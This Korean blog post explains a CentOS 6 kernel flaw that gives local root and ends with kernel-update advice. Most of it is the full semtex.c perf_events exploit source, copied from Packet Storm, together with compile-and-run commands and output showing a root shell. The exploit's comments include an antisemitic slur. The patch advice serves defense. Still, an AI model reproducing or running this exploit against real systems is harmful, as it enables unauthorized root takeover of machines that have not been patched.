티스토리 뷰
[centos 6.x] exploit을 이용한 root 탈취에 대한 보안.
일단 exploit공격이 무엇인지 부터 알아야 하는데 WIKI에는 다음과 같이 정의 하고 있습니다.
취약점 공격 또는 익스플로잇(exploit)이란 컴퓨터의 소프트웨어나 하드웨어 및 컴퓨터 관련 전자 제품의 버그, 보안 취약점 등 설계상 결함을 이용해 공격자의 의도된 동작을 수행하도록 만들어진 절차나 일련의 명령, 스크립트, 프로그램 또는 특정한 데이터 조각[1][2]을 말하며, 이러한 것들을 사용한 공격 행위를 이르기도 한다.
취약점 공격은 주로 공격 대상 컴퓨터의 제어 권한 획득이나 서비스 거부 공격(DoS) 등을 목적으로 한다.
centos 6.x kernel (version 2.6.37~3.8.9 )에 root권한을 탈취 할 수 있는 치명적인 결함이 발견되었다고 합니다.
Sample코드
/* * linux 2.6.37-3.x.x x86_64, ~100 LOC * gcc-4.6 -O2 semtex.c && ./a.out * 2010 sd@fucksheep.org, salut! * * update may 2013: * seems like centos 2.6.32 backported the perf bug, lol. * jewgold to 115T6jzGrVMgQ2Nt1Wnua7Ch1EuL9WXT2g if you insist. */ #define _GNU_SOURCE 1 #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/mman.h> #include <syscall.h> #include <stdint.h> #include <assert.h> #define BASE 0x380000000 #define SIZE 0x010000000 #define KSIZE 0x2000000 #define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337)))) void fuck() { int i,j,k; uint64_t uids[4] = { AB(2), AB(3), AB(4), AB(5) }; uint8_t *current = *(uint8_t **)(((uint64_t)uids) & (-8192)); uint64_t kbase = ((uint64_t)current)>>36; uint32_t *fixptr = (void*) AB(1); *fixptr = -1; for (i=0; i<4000; i+=4) { uint64_t *p = (void *)¤t[i]; uint32_t *t = (void*) p[0]; if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue; for (j=0; j<20; j++) { for (k = 0; k < 8; k++) if (((uint32_t*)uids)[k] != t[j+k]) goto next; for (i = 0; i < 8; i++) t[j+i] = 0; for (i = 0; i < 10; i++) t[j+9+i] = -1; return; next:; } } } void sheep(uint32_t off) { uint64_t buf[10] = { 0x4800000001,off,0,0,0,0x300 }; int fd = syscall(298, buf, 0, -1, -1, 0); assert(!close(fd)); } int main() { uint64_t u,g,needle, kbase, *p; uint8_t *code; uint32_t *map, j = 5; int i; struct { uint16_t limit; uint64_t addr; } __attribute__((packed)) idt; assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE); memset(map, 0, SIZE); sheep(-1); sheep(-2); for (i = 0; i < SIZE/4; i++) if (map[i]) { assert(map[i+1]); break; } assert(i<SIZE/4); asm ("sidt %0" : "=m" (idt)); kbase = idt.addr & 0xff000000; u = getuid(); g = getgid(); assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase); memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &fuck, 1024); memcpy(code-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf", printf("2.6.37-3.x x86_64\nsd@fucksheep.org 2010\n") % 27); setresuid(u,u,u); setresgid(g,g,g); while (j--) { needle = AB(j+1); assert(p = memmem(code, 1024, &needle, 8)); if (!p) continue; *p = j?((g<<32)|u):(idt.addr + 0x48); } sheep(-i + (((idt.addr&0xffffffff)-0x80000000)/4) + 16); asm("int $0x4"); assert(!setuid(0)); return execl("/bin/bash", "-sh", NULL); }
출처 : http://packetstormsecurity.com/files/121616/semtex.c
Compile
gcc로 -O2 Optimization 컴파일 옵션을 주어 컴파일 합니다. ( -O2 옵션은 만들어지는 코드가 가능한 빠르게 수행되도록 하지만, 코드의 크기가 너무 커지지 않도록 하는 범위에서 최적화를 수행합니다. )
$ gcc -O2 semtex.c
$ ./a.out
2.6.37-3.x x86_64
sd _at_ fucksheep.org 2010
-sh-4.1# id
uid=0(root) gid=0(root) groups=0(root),501(true)
따라서 커널을 업데이트 해야 하는데 2.6.32-358.6.2.el6.x86_64 즉 버그 패치 358.6.2 버전에 위 문제가 사라졌기 떄문에 이보다 낮은 버전을 사용 중이라면 반드시 커널 update를 통해 버전을 올려야 합니다.
# yum update kernel*
$ ./a.out
a.out: semtex.c:51: sheep: Assertion `!close(fd)' failed.
패치 후엔 위와 같이 fail이 뜨는 걸 확인 할 수 있습니다.
.by rocksea
'Developer' 카테고리의 다른 글
[eclipse kepler] maven plugin 설치 (0) | 2013.12.06 |
---|---|
[R] 데이터 분석예제 (2) | 2013.11.13 |
[DBMS] DBMS 별 rownum 사용법. (4) | 2013.11.08 |
[R]데이터 마이닝 도구 "R" 소개 및 설치. (0) | 2013.10.31 |
[redis] redis failover tool "Sentinel" 사용법. (5) | 2013.10.28 |
- Total
- Today
- Yesterday
- 영작
- Python Django
- 대명사 구문
- 조동사
- it
- AWS
- PostgreSQL
- 가정법
- 여행
- 해외여행
- 베트남
- redis
- 도덕경
- 다낭
- Business English
- 비교구문
- maven
- hdfs
- 영문법
- 비지니스 영어
- NGINX
- ubuntu
- Python
- k8s
- nodejs
- mongoDB
- memcached
- hadoop
- 스페인 여행
- JBOSS
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | |||
5 | 6 | 7 | 8 | 9 | 10 | 11 |
12 | 13 | 14 | 15 | 16 | 17 | 18 |
19 | 20 | 21 | 22 | 23 | 24 | 25 |
26 | 27 | 28 | 29 | 30 | 31 |